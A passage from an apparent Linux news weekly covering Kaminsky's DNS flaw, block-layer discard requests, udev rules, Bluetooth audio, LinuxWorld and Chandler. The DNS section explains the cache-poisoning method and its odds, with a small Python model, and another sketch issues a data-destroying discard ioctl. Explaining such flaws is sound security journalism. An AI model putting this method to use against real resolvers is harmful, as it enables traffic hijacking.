We were left to wonder how one might overcome the limitations of DC power,
or how to get light to move faster.  Those points did get a laugh from the
audience though.  All in all, one might wish for something more
Linux-related at LinuxWorld, but it was an entertaining presentation.

		Details of the DNS flaw revealed


Dan Kaminsky spoke to a packed house at Black Hat on 6 August to outline
the fundamental flaw he found in the Domain Name System (DNS).  Contrary to
his hopes, though, the flaw was discovered and publicized before his 
presentation.  The vulnerability is interesting in its own right, but the
implications of what can be done with it are staggering.  In addition, the
"fix" has well understood shortcomings that can still potentially be
exploited to poison DNS caches.

 
We reported on the
vulnerability in early July, including Kaminsky's request that security
folks not publicly speculate about the flaw.  As one might guess, that
request was largely ignored.  When security researcher Halvar Flake published
his speculation, another researcher, who was known to have the details
of the flaw, publicly
confirmed it, but just as quickly removed the confirmation.  While it
sounds a bit like a security 
community soap opera, it was fairly clearly caused by the attempt to
contain the vulnerability information.


An important part of DNS is the ability to delegate to another nameserver.
When looking up example.net, first one of the root nameservers is
consulted; it does not know the answer so it delegates to one of the
nameservers that handle .net addresses.  The delegation response
includes the names of the servers being delegated to and, helpfully,
the IP 
addresses of those servers as well.  It is this helpful addition, which is
meant to reduce DNS traffic, that can be exploited.


The key to DNS cache poisoning is that the first good answer wins.
If an attacker can send a packet with all of the proper information, but
with his own IP address substituted for the correct one, and that packet
reaches the querying server first, the attacker wins.  In order for that to
happen, the attacker needs to arrange, or know, that the victim will be
making a particular query, and must be able to create a response that will
be considered "good".


Each DNS query has a 16-bit transaction ID; early implementations just had
an incrementing counter, but since that time random transaction IDs have
been used.  In order for a DNS response to be accepted, it must have the
same transaction ID as the request.
Just over a year ago, we wrote about a cache poisoning
vulnerability in BIND that was caused by a predictable random number
generator.  When an attacker can narrow down the possible values for
transaction IDs, it reduces the number of responses they must generate
commensurately. 


Absent any method to predict transaction IDs, an attacker must, on average,
get 32K forged responses in before 
the correct response arrives, which is difficult, at best, to do.  If
the attacker can cause the victim to make multiple requests, though, they
can increase their chances.  Because DNS servers cache the results of their
queries, repeated requests for the same host information will not generate
additional lookups.


Kaminsky observed that if you make the victim request information about
multiple, probably non-existent names in a domain, it will have to make a
request to the nameserver responsible for that domain multiple times.  If
the victim queries for foo1.example.net,
foo2.example.net, etc., 
it will use a different, random transaction ID for each request.  The
attacker can flood the victim with packets purporting to delegate the
request to another server, ns.example.net say, but include an IP
address under its control as the IP for that server.


The net result is that if one of the attacker's responses gets accepted,
because it finally guessed the right transaction ID, the victim's
nameserver cache has been poisoned.  The attacker can control all lookups
in the entire example.net domain because it has substituted its own
server as the nameserver for that domain.  Because of the birthday paradox,
the attacker does not need to generate anywhere near 32K responses to have
a high probability of having one with a correct transaction ID.  In his
testing, Kaminsky found 
that he could poison a cache like this in less than 10 seconds.
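
The effect of being able to retry can be seen with a little arithmetic.  The sketch below uses a deliberately simplified model, which is an assumption of this example and not Kaminsky's own analysis: every lookup of a fresh name is an independent race, and in each race the attacker lands some number of forged replies, each with a distinct transaction ID, before the real answer arrives.  The figures used to exercise it are hypothetical.

```python
ID_SPACE = 2 ** 16  # number of possible 16-bit transaction IDs

def race_success(forged_per_race):
    """Chance of winning one race with distinct forged transaction IDs."""
    if forged_per_race < 0:
        raise ValueError("forged_per_race must be non-negative")
    return min(forged_per_race, ID_SPACE) / ID_SPACE

def overall_success(forged_per_race, races):
    """Chance that at least one of `races` independent races is won."""
    miss = 1.0 - race_success(forged_per_race)
    return 1.0 - miss ** races
```

Under this model, an attacker who manages only 100 forged replies per race wins any single race about 0.15% of the time, but overall_success(100, 1000) is better than three in four.  Each failed guess costs nothing, since the attacker simply asks about the next nonexistent name.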


This technique works all the way up the hierarchy of DNS servers,
potentially allowing top-level-domain or root nameservers to be poisoned.
It is clearly a very serious flaw that can be exploited in a huge
number of ways.  Kaminsky's Black Hat slides
[PowerPoint format, but viewable in OpenOffice] detail many different 
implications and are well worth a read.  Also,
for an excellent description of how DNS works as well as more details on
the flaw Kaminsky found, see Steve
Friedl's illustrated guide.


The "fix" that was rolled out in a coordinated fashion by
many different vendors is to randomize the source UDP port for each
query.  This is a technique that was implemented years ago in Daniel
Bernstein's djbdns and has been recommended by various cache poisoning
researchers (notably Amit Klein) for some time.  By doing this, an attacker
must also guess the proper UDP port to send the response to, which can
provide up to an additional 16 bits of randomness to the query.  In the
best case, where all possible UDP source ports are used, 
that increases the number of possible responses from 64K to over 4 billion. 
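
The arithmetic behind those figures can be checked in a few lines. The helper name `search_space` is hypothetical, and the calculation assumes that the transaction ID and the source port are chosen independently and uniformly.

```python
TXID_BITS = 16


def search_space(usable_ports: int) -> int:
    """Number of (transaction ID, source port) pairs an attacker must cover."""
    return (2 ** TXID_BITS) * usable_ports


print(search_space(1))        # fixed source port: 65536
print(search_space(2 ** 16))  # best case, all ports used: 4294967296
```

A resolver that can only draw from a smaller pool of ports gets proportionally less benefit, which is why the text says "up to" 16 additional bits.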


That seems like it would take the attack out of the realm of possibility,
but that clearly isn't the case.  Kaminsky and the vendors all knew that
adding source port randomization only made it harder—not impossible.
Linux kernel hacker Evgeniy Polyakov has done some experiments with the
patched version of BIND on a gigabit ethernet LAN, finding that he
could poison a 
cache in under ten hours. As he points out: "So, if you have a GigE
lan, any trojaned machine can poison your DNS during one night." 


Other solutions are actively being sought, but it is a difficult problem
because backward compatibility with countless DNS installations needs to
be maintained.  As always when a DNS problem is publicized, DNSSEC is
touted as the solution.  There are numerous technical and political
problems that have stood in the way of DNSSEC adoption; those
seem unlikely to just disappear.  


This DNS flaw is serious, but there are
plenty of serious internet security issues, as Kaminsky points out in his blog:


Even if we go from 32 bits of entropy to 128 bits — even if we deploy
DNSSec — we're still going to deliver email insecurely.  We're still
going to have an almost entirely unauthenticated web.  We're still going to
ignore SSL certificate errors, and we're still going to have application
after application that can't autoupdate securely. 

That, at the end of the day, is a far larger problem than this particular
DNS issue.


While there may be bigger problems in our internet infrastructure, there
are few things that are as pervasive as DNS.  Kaminsky points out a number
of non-obvious places where it is used—and could be abused—such
as mailer lookups of HELO strings to try and decide whether to accept email
or web servers 
doing reverse lookups for logfile messages.  It is a little surprising that
something so integral had such an obvious, in retrospect, flaw in its
design that went undetected for around 25 years.  It makes
one wonder what else is lurking out there.

		Block layer discard requests


Solid-state, flash-based storage devices are getting larger and cheaper, to
the point that they are starting to displace rotating disks in an
increasing number of systems.  While flash requires less power, makes less
noise, and is faster (for random reads, at least), it has some peculiar
quirks of its own.  One of those is the need for wear leveling - trying to
keep the number of erase/write cycles on each block about the same to avoid
wearing out the device prematurely.

Wear leveling forces the creation of an indirection layer mapping logical
block numbers (as seen by the computer) to physical blocks on the media.
Sometimes this mapping is done in a translation layer within the flash
device itself; it can also be done within the kernel (in the UBI layer, for example) if the
kernel has direct access to the flash array.  Either way, this remapping
comes into play anytime a block is written to the device; when that
happens, a new block is chosen from a list of free blocks and the data is
written there.  The block which previously contained the data is then added
to the free list.
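
The remapping described above can be modeled with a toy translation layer. This is only an illustrative sketch: the class and its names are hypothetical, real flash translation layers work on erase blocks and pages with far more bookkeeping, and the first-in, first-out free list is just one simple way to spread writes around.

```python
from collections import deque


class FlashMap:
    """Toy translation layer: logical block -> physical block."""

    def __init__(self, physical_blocks: int) -> None:
        self.free = deque(range(physical_blocks))  # free list, oldest first
        self.mapping = {}                          # logical -> physical
        self.erase_counts = [0] * physical_blocks

    def write(self, logical: int) -> int:
        """Put new data for `logical` in a fresh block; recycle the old one."""
        if not self.free:
            raise RuntimeError("no free blocks left")
        new_phys = self.free.popleft()
        old_phys = self.mapping.get(logical)
        self.mapping[logical] = new_phys
        if old_phys is not None:
            self.erase_counts[old_phys] += 1  # old block is erased for reuse
            self.free.append(old_phys)
        return new_phys


if __name__ == "__main__":
    fm = FlashMap(4)
    # Rewriting the same logical block walks across all physical blocks.
    print([fm.write(0) for _ in range(5)])
```

Even though the host keeps rewriting a single logical block, the erase cycles end up spread evenly over the physical blocks.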

If the device fills up with data, that list of free blocks can get quite
short, making it difficult to deal with writes and compromising the wear
leveling algorithm.  This problem is compounded by the fact that the
low-level device does not really know which blocks contain useful data.
You may have deleted the several hundred pieces of spam backscatter from
your mailbox this morning, but the flash mapping layer has no way of
knowing that, so it carefully preserves that data while scrambling for free
blocks to accommodate today's backscatter.  It would be nice if the
filesystem layer, which knows when the contents of files are no longer
wanted, could communicate this information to the storage layer.

At the lower levels, groups like the T13
committee (which manages the ATA standards) have created protocol
extensions to allow the host computer to indicate that certain sectors are
no longer in use; T13 calls its new command "trim."  Upon receipt of a trim
command, an ATA device can immediately add the indicated sectors to its
free list, discarding any data stored there.  Filesystems, in turn, can
cause these commands to be issued whenever a file is deleted (or
truncated).  That will allow the storage device to make full use of the
space which is truly free, making the whole thing work better.
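
To make the effect of a trim command concrete, here is a deliberately simplified model of the device's bookkeeping. The `Device` class is hypothetical and ignores the logical-to-physical mapping entirely; it only shows how the free list grows once the host says which sectors no longer matter.

```python
class Device:
    """Toy device that tracks which sectors it must preserve."""

    def __init__(self, sectors: int) -> None:
        self.free = set(range(sectors))
        self.in_use = set()

    def write(self, sector: int) -> None:
        """Data written here must be preserved until told otherwise."""
        self.free.discard(sector)
        self.in_use.add(sector)

    def trim(self, start: int, count: int) -> None:
        """Host says these sectors hold nothing of value any more."""
        for sector in range(start, start + count):
            if sector in self.in_use:
                self.in_use.remove(sector)
                self.free.add(sector)


if __name__ == "__main__":
    dev = Device(8)
    for s in range(6):
        dev.write(s)
    print(len(dev.free))  # only two sectors left to work with
    dev.trim(0, 4)        # the filesystem deleted a file
    print(len(dev.free))  # the device can now reuse six sectors
```

Without the `trim()` call, the device would go on preserving the deleted file's sectors indefinitely.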

What Linux lacks now, though, is the ability for filesystems to tell
low-level block drivers about unneeded sectors.  David Woodhouse has posted
a proposal to fill that gap in the form of the discard requests patch set.  As
one might expect, the patches are relatively simple - there's not much to
communicate - though some subtleties remain.

At the block layer, there is a new request function which can be called by
filesystems:


This call will enqueue a request to bdev, saying that
nr_sects sectors starting at the given sector are no
longer needed and can be discarded.  If the low-level block driver is
unable to handle discard requests, -EOPNOTSUPP will be returned.
Otherwise, the request goes onto the queue, and the end_io()
function will be called when the discard request completes.  Most of the
time, though, the filesystem will not really care about completion - it's
just passing advice to the driver, after all - so end_io() can be
NULL and the right thing will happen.

At the driver level, a new function to set up discard requests must be
provided:


To support discard requests, the driver should use
blk_queue_set_discard() to register its
prepare_discard_fn().  That function, in turn, will be called
whenever a discard request is enqueued; it should do whatever setup work is
needed to execute this request when it gets to the head of the queue.

Since discard requests go through the queue with all other block requests,
they can be manipulated by the I/O scheduler code.  In particular, they can
be merged, reducing the total number of requests and, perhaps, pulling
together enough sectors to free a full erase block.  There is a danger
here, though: the filesystem may well discard a set of sectors, then write
new data to them once they are allocated to a new file.  It would be a
serious mistake to reorder the new writes ahead of the discard operation,
causing the newly-written data to be lost.  So discard operations will need
to function as a sort of I/O barrier, preventing the reordering of writes
before and after the discard.  There may be an option to drop the barrier
behavior, though, for filesystems which are able to perform their own
request ordering.
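
The merging idea can be sketched as follows. This is not the kernel's I/O scheduler, just a hypothetical helper that coalesces discard ranges given as (starting sector, number of sectors) pairs. Reordering is only safe here because every entry is a discard; as noted above, a real scheduler must not move a write across a discard of the same sectors.

```python
def merge_discards(ranges):
    """Coalesce (start_sector, nr_sects) discard ranges that touch or overlap."""
    merged = []
    for start, count in sorted(ranges):
        end = start + count
        if merged and start <= merged[-1][1]:
            # Adjacent to or overlapping the previous range: extend it.
            merged[-1][1] = max(merged[-1][1], end)
        else:
            merged.append([start, end])
    return [(s, e - s) for s, e in merged]


if __name__ == "__main__":
    # Two 8-sector discards that sit side by side become one 16-sector discard.
    print(merge_discards([(8, 8), (0, 8), (32, 4)]))
```

Larger merged ranges are more likely to cover a whole erase block, which is what the underlying device ultimately wants to free.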


Outside of filesystems, there may occasionally be a need for other programs
to be able to issue discard requests; David's example is mkfs,
which could discard the entire contents of the device before making a new
filesystem.  For these applications, there is a new ioctl() call
(BLKDISCARD) which creates a discard request.  Needless to say,
applications using this feature should be rare and very carefully written. 
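
For illustration, a user-space caller might look something like the sketch below. It assumes the interface as it is defined in mainline kernel headers, where BLKDISCARD is `_IO(0x12, 119)` and the argument is a pair of 64-bit values giving the starting offset and length in bytes; the version in the patch set under discussion may differ. The helper names and the 512-byte sector size are assumptions made for the example. Calling `discard()` on a real device destroys the data in that range.

```python
import fcntl
import os
import struct

BLKDISCARD = 0x1277   # _IO(0x12, 119) in <linux/fs.h>; assumed, see above
SECTOR_SIZE = 512     # assumption: 512-byte sectors


def discard_range(start_sector: int, nr_sects: int) -> bytes:
    """Pack the ioctl argument: two native uint64 values, offset and length in bytes."""
    return struct.pack("QQ", start_sector * SECTOR_SIZE, nr_sects * SECTOR_SIZE)


def discard(device_path: str, start_sector: int, nr_sects: int) -> None:
    """Ask the kernel to discard a range.  DESTROYS DATA in that range."""
    fd = os.open(device_path, os.O_WRONLY)
    try:
        fcntl.ioctl(fd, BLKDISCARD, discard_range(start_sector, nr_sects))
    finally:
        os.close(fd)
```

Separating the packing step from the ioctl() call makes it possible to check the arithmetic without touching a device.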


David's patch includes tweaks for a number of filesystems, enabling them to
issue discard requests when appropriate.  Some of the low-level flash
drivers have been updated as well.  What's missing at this point is a fix
to the generic ATA driver; this will be needed to make discard requests
work with flash devices using built-in translation layers - which is most
of the devices on the market, currently.  That should be a relatively small
piece of the puzzle, though; chances are good that this patch set will be
in shape for inclusion into 2.6.28.

		Udev rules and the management of the plumbing layer


Once upon a time, a Linux distribution would be installed with a
/dev directory fully populated with device files.  Most of them
represented hardware which would never be present on the installed system,
but they needed to be there just in case.  Toward the end of this era, it
was not uncommon to find systems with around 20,000 special files in
/dev, and the number continued to grow.  This scheme was unwieldy
at best, and the growing number of hotpluggable devices (and devices in
general) threatened to make the whole structure collapse under its own
weight.  Something, clearly, needed to be done.

For a little while, it seemed like that something might be devfs, but that
story did not end well.  The
real solution to the /dev mess turned 
out to be a tool called "udev," originally written by Greg Kroah-Hartman.
Udev would respond to device addition and removal events from the kernel,
creating and removing special files in /dev.  Over time, udev
gained more powerful features, such as the ability to run external programs
which would help to create persistent names for transient devices.  Udev is
now a key component in almost all Linux systems.  It's like the plumbing in
a house; most people never notice it until it breaks.  Then they realize
how important a component it really is.


Udev is configured via a set of rules, found under
/etc/udev/rules.d on most systems.  These rules specify how
devices should be named, what their ownership and permissions should be,
which kernel modules should be loaded, which programs should be run, and so
on.  The udev rule set also allows distributors and system administrators
to tweak the system's device-related behavior to match local needs and
taste.
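
To give a feel for what a rule looks like, the sketch below splits a single rule line into its match conditions and its assignments. The sample rule is made up for the example, and the parser handles only a simplified subset of the rule syntax (quoted values, no line continuations, only the operators listed in the pattern); it is not how udev itself reads its rules.

```python
import re

# KEY or KEY{attr}, an operator, then a double-quoted value.
RULE_KEY = re.compile(
    r'\s*([A-Z_]+(?:\{[^}]*\})?)\s*(==|!=|\+=|:=|=)\s*"([^"]*)"\s*'
)


def parse_rule(line: str):
    """Split one rule line into match conditions and assignments."""
    matches, assignments = [], []
    for key, op, value in RULE_KEY.findall(line):
        target = matches if op in ("==", "!=") else assignments
        target.append((key, op, value))
    return matches, assignments


if __name__ == "__main__":
    rule = 'KERNEL=="sd*", SUBSYSTEM=="block", GROUP="disk", MODE="0660"'
    conditions, actions = parse_rule(rule)
    print(conditions)
    print(actions)
```

The split between conditions that are tested and values that are assigned is what makes a rules file read more like a small program than a list of settings.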

Or maybe not.  Udev maintainer Kay Sievers has recently let it be known that he would like all
distributors to be using the set of udev rules shipped with the program
itself.  Says Kay:


	 We should all unify as far as possible.  Red Hat, SUSE and Gentoo
	 are already using the same rules files, with a minimal rules set
	 on top, in a distro specific file. We ask the rest of the universe
	 to join us, and do the same.


This request was surprising to some.  A Linux system is full of utilities
with configuration files under /etc; there is not normally a push
for all distributions to use the same ones.  So why should all distributors
use the same udev rules?  The reasoning here would
appear to come down to these points:


 The udev rules files are not really configuration files - they are,
     instead, code written in a domain-specific language.  For a
     distributor to change those files is akin to patching the underlying C
     code; far from unheard of, but generally seen as being undesirable.
     As a way of underscoring this point, the udev developers are moving
     the udev rules out of /etc and into /lib.

 There is little reason for distributors to differentiate themselves
     based on their device naming schemes, and every reason to have all
     Linux systems use the same device names.  For the situations where
     reasonable distributions may still differ - which group should own a
     device, for example - there is a mechanism to add distributor-specific
     rules.

 Increasingly, other packages will depend on a specific udev setup for
     the underlying system.  Distributors which use their own rules will
     have a harder time making these new tools work right.


That last point refers, in particular, to DeviceKit, a
set of tools designed to make the management of devices easier.  Between
them, udev and DeviceKit are being positioned to replace most of the
functionality in the much-maligned hal utility.  See this
posting from David Zeuthen for lots more information on DeviceKit and
the migration away from hal in general.

The only problem is that some distributors aren't playing along.  Marco
d'Itri, the Debian udev maintainer, responded that a common set of udev rules is
"not going to happen."  The default rules, he says, do not meet Debian's
need to support older kernels, and, besides, "I consider my rules
much more readable and elegant than yours".  Ubuntu maintainer Scott
James Remnant is also reluctant to use the
default rules.

Scott appears to be willing to consider a change to the default rules if it
can be made to work right; Marco, instead, seems determined to hold out.
When encouraged to send patches to improve the default rules (and make them
more elegant), he responded:


	Tell me what's missing from my rules instead, I will fix it and
	then you will be able to use them. If nothing is missing, then you
	can replace the files right now.


It appears likely that most of the distributors will come to see the udev
rules as code which is to be maintained upstream; even Debian may come
along eventually.  As this happens, the layer of "plumbing" which sits just
on top of the kernel should be worked into better shape.  Kernel developers
may find themselves involved in this process; David has posted a proposal that all new kernel subsystems,
before being merged, must be provided with a set of udev rules.  That would
help the udev developers get a set of default rules into shape before the
distributors feel the need to step in to make things work.

Increasingly, the operation of the kernel is being tied to a set of
low-level user-space applications; there is not much which can be done with
a bare kernel.  How all of this low-level plumbing should work, and how it
should interoperate with the kernel, is still being worked out. The
management of udev
policies is just one of the outstanding issues.  So the
upcoming Linux Plumbers
Conference would seem to be well timed; there's a lot to talk about.

		OLS: Audio Streaming over Bluetooth


On July 23 Marcel Holtmann delivered a presentation on the state of
Audio Streaming over Bluetooth at the 2008 Linux Symposium in Ottawa.
Holtmann's background involves working on improving Linux Bluetooth
audio support for laptops and embedded systems such as cell phones.


Marcel expressed frustration with the complexity of the Bluetooth specifications,
which include approximately 20 protocols and 40 profiles.  Profiles include things like
mono headsets, in-car usage and high quality stereo headphones.  There are protocols
for serial device emulation, phone book access, caller ID information, text messaging and
multiple options for audio and video.


Bluetooth defines separate protocols for streaming and for control operations such as
skipping tracks, seeking within tracks, and displaying ID3 information.  Having these
aspects split into different protocols was called "messy" because they are always used together.


Mono headsets are supported by the Synchronous Connection Oriented link (SCO), while 
the Advanced Audio Distribution Profile (A2DP) is designed for high quality stereo audio.
For audio compression Bluetooth defines a royalty-free SubBand-Codec (SBC) to avoid 
fees for use of common codecs like MP3 and AAC.  All A2DP devices must support
SBC, but many can decode MP3 and AAC as well.
Linux's SBC support was initially very poor, but some developers from the Instituto Nokia de Tecnologia in Brazil stepped up to improve encoding, and now the LGPL SBC
implementation rivals some of the
best commercial implementations.


Early Bluetooth headset support in Linux involved copying all the audio data over
sockets from the application to the Bluetooth daemon.  The daemon would then copy the
data again to the device, causing unnecessary CPU usage and increasing latency.  The current
design works by setting up channels and connecting external applications directly
to the device sockets.  Marcel also mentioned investigating 
a shared memory approach for better performance at the cost of some extra complexity.


Adding support for a Bluetooth audio device is
quite different from supporting standard audio hardware: compressed data must be sent directly to the
devices, possibly with ID3 and other information.  If the audio being played is in a format
that a device does not support, it must be decoded and re-encoded first.  Bluetooth devices will also
appear and disappear while audio is being played.
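
The decision between sending a file as-is and re-encoding it can be sketched in a few lines. The function and the string labels it returns are hypothetical; the only fact relied upon is that every A2DP device must support SBC, which makes it the universal fallback.

```python
def plan_stream(source_codec: str, device_codecs: set) -> str:
    """Decide how to deliver audio to an A2DP device."""
    if source_codec in device_codecs:
        # The device can decode this format itself: send it untouched.
        return f"passthrough:{source_codec}"
    # Every A2DP device must accept SBC, so decode and re-encode to that.
    return "transcode:sbc"


if __name__ == "__main__":
    print(plan_stream("mp3", {"sbc", "mp3"}))  # passthrough:mp3
    print(plan_stream("aac", {"sbc"}))         # transcode:sbc
```

Since devices come and go during playback, a real implementation would have to rerun this decision whenever the set of connected devices changes.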


Marcel on ALSA: "I won't touch it anymore."  ALSA's primary failing is that it wasn't designed
to support virtual devices.
He is also not convinced that the current direction of PulseAudio is suitable for
Bluetooth audio; in particular, there is no support for
changing codecs while audio is being sent to a device.
GStreamer, however, can support the concept of virtual devices, sending
out encoded data and sending ID3 information when required.
If a file format is supported by a Bluetooth device,
GStreamer can easily be told to send it as-is without re-encoding it.
It can also handle the passing off of the encoding and decoding tasks
to special hardware, which is commonly required for embedded systems.


Future work includes adding more intelligence to the handling of
control signals.
When the user presses Pause and there are multiple devices and streams 
active, which stream should be affected?
The current implementation applies the action to all streams,
but it may be better to be able to tell which control device is
associated with which stream.  


There is also ongoing work to support new hardware.
Marcel has had some issues with headsets that are very sensitive
to timing but don't provide enough timing information for the problems
to be fixed reliably.  There have also been some problems supporting
"Enhanced" Synchronous Connection-oriented (eSCO) Links
due to vendors that are unwilling to cooperate with the developers.


For more information on Bluetooth development see Marcel's OLS Paper [pdf] and
BlueZ.org, the site for the
official Linux Bluetooth protocol stack.


		Distributions at LinuxWorld 2008


I went to LinuxWorld last week primarily to lead a Birds of a Feather
discussion, the title of which was "Which Linux Distribution is Right for
Me?"  It seemed to be generally well received, though a few people left
early after it became clear that there were no flashy slides, nor was I
going to reveal the "One True Linux Distribution".  I don't believe there
is one true distribution, just as there is no one true use for Linux.  So I
pointed people to The List and we talked
about a few distributions that might meet some specific needs that people
had.

There was plenty of time left over to walk around the Expo, looking for
distribution booths on the show floor.  Oracle had a big booth to the right
of the entrance.  Access was on the other side.  

The Linux Garage was an interesting place, full of various embedded
devices.  Did you know that the Open Moko phones are currently available
with three versions of their OS?  Version 2007.2 is the oldest.  It uses gtk
and supports caller dialing contacts.  The ASU 2008.8 OS is based on Qt.
The latest and greatest Open Moko system is the FSO (FreeSmartphone.Org)
which makes use of gtk, Qt and Python.  Next up will be a version using
Trolltech's Qtopia for the GreenPhone.
The NSLU2 comes with Debian or OpenWRT.  OpenWRT is also used in the FON
wireless router and the Meraki wireless router.  The latter can be managed
via a web interface.  OpenWRT will also run on ASUS WL520GU and the Gateway
Avila, but it is not installed by default.


Canonical had a large booth.  In one half they were showing off Netbooks, with
the Ubuntu remix for the Netbook.  The other half had various business
partners showing off the software packages that were available on Ubuntu.
Ubuntu was also the distribution of choice at the Installfest.  Xubuntu was
used on the really low memory machines.  Untangle was a major sponsor of
the Installfest.


Linpus and gOS had crowded booths, so I didn't get very close.  I did find
some pictures from the gOS
booth.  Fedora and openSUSE had booths in the .org pavilion, where I
stopped for a quick chat but didn't get any pictures.  Fedora had computers
from Shuttle, with Fedora pre-installed.  openSUSE's mlasars had this to say about LWE
2008.  Linux Magazine's Joe Casad interviewed
Fedora's Karsten Wade (video) and Karsten had
some reflections on his blog.  I also stopped at the Vyatta booth.  I
reviewed Vyatta briefly several years ago, but at that time the distribution
didn't do DHCP.  The new version of Vyatta does DHCP, VPN and lots
of other things.  Vyatta recently announced
a firewall/router product that they plan to start shipping in a few weeks.


Foresight joined up with Shuttle Computers at their booth.  Small and quiet
Shuttle computers were also at the Fedora booth.  Shuttle will install
Foresight or Fedora (and probably other distributions) if you like.
Foresight is based on rPath and has been known for closely following the
GNOME desktop.  It seems that Foresight is now planning on a KDE
edition.


		Chandler finally reaches a 1.0 release


The Chandler project has been
around since 2001, periodically releasing new versions of its personal
information management (PIM) tool, but never quite reaching the 1.0
milestone—until now.  Over that time, Chandler has undergone various
major revisions of both code and philosophy, while the rest of the software
industry has hardly been standing still.  Whether Chandler is relevant or
important going forward is an open question, but it does have some
interesting ideas as well as potentially useful code.


Chandler is the brainchild of Mitch Kapor, of Lotus 1-2-3 fame, who started
the project as part of his Open
Source Applications Foundation (OSAF).  Kapor and others have funded
OSAF to work on Chandler over the last seven years, but in January all that
changed.  Kapor
announced that he was leaving the board and only continuing to finance
Chandler until the end of 2008.  The 1.0
release is to some extent a "last gasp" attempt to build a community of
users and 
developers to continue Chandler development down the road.


Since the time when Chandler was originally envisioned as a shareable
calendar and 
information manager, many other, similar tools have come about.  Evolution
is a free software example, while Google Calendar is popular, but
proprietary and closed.  Neither of those covers the full feature spectrum that
Chandler aspires to, but they have been available for quite some time.


The idea behind Chandler will be familiar to those who know about the
Getting Things Done system.  Organizing and integrating to-do lists,
calendar events, email, and notes into a single system—and single
application—is the driving force.  These items (known as "notes") can
be tagged into various
collections (like Home, Work, etc.), assigned as events in the calendar, or
mailed to others. 


The calendar works like one would expect.  Events have the standard fields:
start/end time, frequency for recurring events, various alarm options, etc.
Events get color-coded based on their collection and the calendar itself
can be viewed at various granularities: day, week, or month.  Based on
their proximity in time, as well as user choice, events get "triaged" into
categories of "Done", "Now", or "Later".


There are multiple synchronization options available with Chandler.
Keeping calendars in sync amongst multiple different systems, with
different import/export formats is clearly something that the Chandler team
focused on.  Because Chandler is cross-platform—written in Python and
available on Linux, OS X, and Windows—it can interface both with tools
that run on those platforms as well as with internet services like Google
Calendar.  As yet there is no Outlook/Exchange synchronization available,
which, one would guess, leaves out a rather large portion of the potential
audience.


The Chandler desktop is only one of two pieces of the Chandler project;
the other is the Chandler
server.  It is the means to share Chandler 
information, either with other users or just with other computers.  Data
can be synchronized to the server, then retrieved on another Chandler desktop
elsewhere.  For those that do not want to run their own server, the project
runs a version of the server as the Chandler hub, which offers free
accounts. 


The 1.0 release looks like a solid tool.  It has some enthusiastic
users, but will that translate to a larger development community?
Chandler development has always been directed—and funded—by the
OSAF, so it suffers from a smaller development community than it might have
otherwise.  


Projects that start as proprietary, but then open their code, sometimes
have difficulties allowing a community to influence or control the
direction of that code thereafter.  We
have seen that with OpenSolaris and other projects.  Chandler seems to
suffer from some of those same problems, even though it came about differently.
By removing the funding, Kapor may well have jump started Chandler
development. 


Seven years is a long time by any standard, but for software, it is an
eternity.  By keeping a relatively tight grip on the direction of the
project, the OSAF may well have kept interested folks who were not on their
payroll from getting involved.  If the project can move to a more open style,
with frequent releases, it may be able to regain some of that lost time.
It is an intriguing tool, but it is way behind schedule.


		GeekPAC to fight for information rights


There's little question that plenty of people are annoyed at how
difficult it is to rip movies from legally purchased DVDs into formats
readable by handheld devices or media players. The lack of consistency in
document formats is an ongoing headache for anyone who receives files
that are only readable with certain software. Information rights management
has become enough of a frustration that a group has formed specifically to
deal with the problem head on. GeekPAC is a political action
committee made up of volunteers who are taking their complaints straight to
Capitol Hill. 

Last year California Assemblyman Mark Leno authored AB
1668, a bill designed to encourage the state to adopt the Open Document
Format as the standard format for government documents. Not
surprisingly, Microsoft came out against the bill and it was eventually
struck down in committee. CollabNet Community Manager and longtime FOSS
supporter John Mark Walker was angry. Realizing that the open source
community had no voice during the hearings and no way to fight back against
the opposition's lobbyists, Walker decided to mobilize support from within
the ranks of the FOSS community and let them do what they do best —
rally behind a cause and prove once again that there's strength in
numbers. So he founded GeekPAC. 

GeekPAC's goal is to pull together enough funding — a
mere $2,200 — to file the necessary paperwork to be formally
recognized by the Federal Election Commission as a Political Action
Committee (PAC). Then the group will locate politicians or candidates in
the House and Senate who support hot-button technology issues like
copyright reform and net neutrality. Once identified, GeekPAC will help
support their campaigns and lobby together for change. 

"If all we do is fund some campaigns, create a few attack ads, and do
the occasional lobbying, I'll be pretty disappointed," says Walker. "The
real goal here is to educate people as to why they should care. Frankly,
those of us who care about our rights in the information age have done a
really poor job of communicating the importance or relevance." 

Indeed, Walker suggests that ambiguous verbiage and a lack of
communication with people outside the tech industry has been the biggest
hindrance to effecting large-scale change. "One of the problems is that we
insist on using terms like 'digital rights,' the usage of which basically
leaves out a large percentage of the population. Most people don't know
what that means, and they assume that digital doesn't include them, because
they don't work in the tech industry and have little contact with people
who do. So lots of digerati swing around their proverbial phalli and talk
'digital rights' this and 'DRM' that, and it becomes a kind of high-tech
circle jerk that is constraining and ultimately self-limiting." 

A better approach, he says, would be to frame these important issues as
"information rights." Once people realize that the bills politicians are
voting on aren't about obscure concepts but rather affect human rights at a
basic level, Walker is confident GeekPAC will make great strides toward
changing minds at the national level. 

"It's really about the free flow of information and letting free
markets do their job. Once you start there, it's a quick hop and a skip
down the path of the founding principles of this great country," explains
Walker. He goes on to note that these issues affect people at every
socio-economic level, from patents that limit free market trade, to
"information restrictions that affect our ability to adequately educate the
public."  

Walker asserts that without a total overhaul of the United States patent
and copyright laws, the information divide will never narrow, and will
ultimately lead to larger problems down the road. "It's really about
education, innovation, and reducing the bar to entry so that America can
remain competitive in the 21st century." 

One of the overriding reasons Walker chose to launch GeekPAC now is
because this is an important election year and political issues are on the
minds of many. Though he acknowledges people have been discussing these
topics for years, talking just isn't enough.  

"In the 10 years that have passed since the DMCA, we still haven't been
able to mount a credible reform effort, and countless horrible things have
taken place on our watch that co-opt our so-called inalienable rights. We
must do more, and I can't think of a better time to do more than an
election year," he says. 

GeekPAC is taking a multi-faceted approach to locating politicians to
support. The group's supporters and volunteers are encouraged to recommend
candidates who they know believe in GeekPAC's goals and
direction. Politicians can also contact the group directly and ask to be
considered for backing from GeekPAC. Once chosen, candidates are asked to
sign a simple pledge promising
to "protect my constituents' fair use rights to information [and] support
the use of open standards in government for the storage and archiving of
public data." 

Walker says GeekPAC is most interested in helping candidates who take a
strong stance on open standards and open access, copyright reform, patent
reform, and net neutrality. "Obviously, we'll be most enthusiastic about
candidates who support all of those, but we will help campaign for
candidates who support at least one of those items." 

The name GeekPAC may ring a bell for those who have been around the FOSS
community for a while. A similar group was formed more than five years ago
but never quite got off the ground. Though the two organizations don't
share any common members, they do have the same goals — and an
affection for the domain name. Before GeekPAC morphed into its current
